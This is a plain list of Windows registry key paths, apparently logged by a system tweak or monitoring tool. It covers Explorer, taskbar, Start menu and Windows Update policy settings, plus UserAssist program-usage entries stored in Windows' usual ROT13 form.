HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ListviewShadow
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTaskGrouping
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarGlomLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSmallIcons
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSmallIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DisablePreviewDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DisablePreviewDesktop
HKEY_CURRENT_USER\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\EXTENSIONS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\au\NoAUShutdownOption
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\UAS
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\au\NoAUAsDefaultShutdownOption
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_PowerButtonAction
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_PowerButtonAction
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Sversbk Cevingr Oebjfvat.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Zvpebfbsg BarQevir.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong Ernqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Rkpry 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\BarAbgr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Bhgybbx 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreCbvag 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Choyvfure 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fxlcr sbe Ohfvarff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jbeq 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\7-Mvc\7-Mvc Svyr Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\NhgbUbgxrl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\Pbaireg .nux gb .rkr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Obkfgnegre\Obkfgnegre Furyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Nobhg Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Purpx Sbe Hcqngrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Pbasvther Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Qngnonfr Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fxlcr sbe Ohfvarff Erpbeqvat Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fcernqfurrg Pbzcner 2016.yax
